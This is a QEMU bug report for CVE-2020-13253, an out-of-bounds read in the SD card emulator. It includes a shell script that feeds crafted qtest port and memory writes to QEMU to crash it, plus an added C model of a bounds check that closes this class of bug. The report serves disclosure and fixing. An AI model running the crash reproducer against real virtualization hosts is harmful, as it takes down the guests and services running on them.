CVE-2020-13253 QEMU: sd: OOB access could crash the guest resulting in DoS
Bug #1880822 reported by P J P
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
QEMU | Fix Released | Undecided | Philippe Mathieu-Daudé |
Bug Description
An out-of-bounds read access issue was found in the SD Memory Card emulator of QEMU. It occurs while performing block write commands via sdhci_write(), if a guest user has sent an 'address' which is OOB of 's->wp_groups'. A guest user/process may use this flaw to crash the QEMU process, resulting in DoS.
CVE References
Changed in qemu: status: New → Confirmed
Changed in qemu: status: Fix Committed → Fix Released
#!/bin/sh
cat << EOF > inp
outl 0xcf8 0x80001810
outl 0xcfc 0xe1068000
outl 0xcf8 0x80001814
outl 0xcf8 0x80001804
outw 0xcfc 0x7
outl 0xcf8 0x8000fa20
write 0xe106802c 0x1 0x6d
write 0xe106800f 0x1 0xf7
write 0xe106800a 0x6 0x9b4b9b5a9b69
write 0xe1068028 0x3 0x6d6d6d
write 0xe106800f 0x1 0x02
write 0xe1068005 0xb 0x055cfbffffff000000ff03
write 0xe106800c 0x1d 0x050bc6c6c6c6c6c6c6c6762e4c5e0bc603040000000000e10200110000
write 0xe1068003 0xd 0x2b6de02c3a6de02c496de02c58
EOF
../bin/qemu-system-x86_64 -qtest stdio -enable-kvm -monitor none \
    -serial none -M pc-q35-5.0 -device sdhci-pci,sd-spec-version=3 \
    -device sd-card,drive=mydrive -nographic \
    -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive < inp
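
The bug description says a guest-supplied address was used to index past `s->wp_groups` during a block write. The following C model is an added example, not QEMU's code and not the patch that fixed this bug; it shows the class of check that closes such a read by validating address and length against the card size before the write-protect bitmap is consulted. All names, the 128 KiB group size and the status bit values are assumptions of the model.

```c
/* Simplified model; not QEMU's hw/sd code. All names are hypothetical. */
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

#define WPGROUP_SHIFT    17u          /* assumed: one write-protect group per 128 KiB */
#define ST_ADDRESS_ERROR (1u << 30)   /* model's "bad address" status bit */
#define ST_WP_VIOLATION  (1u << 26)   /* model's "write-protected" status bit */
#define LONG_BITS (sizeof(unsigned long) * CHAR_BIT)

enum wr { WR_OK, WR_PROTECTED, WR_ADDRESS_ERROR };

struct card {
    uint64_t size;                    /* capacity in bytes */
    const unsigned long *wp_groups;   /* bitmap with one bit per group of the card */
    uint32_t status;                  /* error bits reported back to the guest */
};

/* Bitmap index an address maps to; an unchecked lookup reads wp_groups at this index. */
uint64_t wp_index(uint64_t addr) { return addr >> WPGROUP_SHIFT; }

/* Validate a guest-supplied block write before the bitmap is touched. */
enum wr check_block_write(struct card *c, uint64_t addr, uint32_t len)
{
    /* Overflow-safe form of "addr + len > size"; len == 0 is rejected so that
     * addr == size can never reach the bitmap lookup below. */
    if (len == 0 || len > c->size || addr > c->size - len) {
        c->status |= ST_ADDRESS_ERROR;
        return WR_ADDRESS_ERROR;
    }
    uint64_t g = wp_index(addr);      /* addr < size, so g is a valid group index */
    if ((c->wp_groups[g / LONG_BITS] >> (g % LONG_BITS)) & 1ul) {
        c->status |= ST_WP_VIOLATION;
        return WR_PROTECTED;
    }
    return WR_OK;
}

/* Constructed sample: 1 MiB card (8 groups) with group 2 write-protected. */
static const unsigned long sample_bitmap[1] = { 1ul << 2 };
struct card sample_card(void) { struct card c = { 1u << 20, sample_bitmap, 0 }; return c; }

int main(void)
{
    struct card c = sample_card();
    int ok = check_block_write(&c, 0, 512), wp = check_block_write(&c, 0x40000, 512);
    int bad = check_block_write(&c, 0x10000000, 512);   /* constructed OOB address */
    printf("in-range=%d protected=%d oob=%d (unchecked index %llu of 8)\n",
           ok, wp, bad, (unsigned long long)wp_index(0x10000000));
    return 0;
}
```

On the constructed 1 MiB card, the out-of-range address would map to group 2048 of an 8-group bitmap; the check returns an address error to the guest instead of reading there.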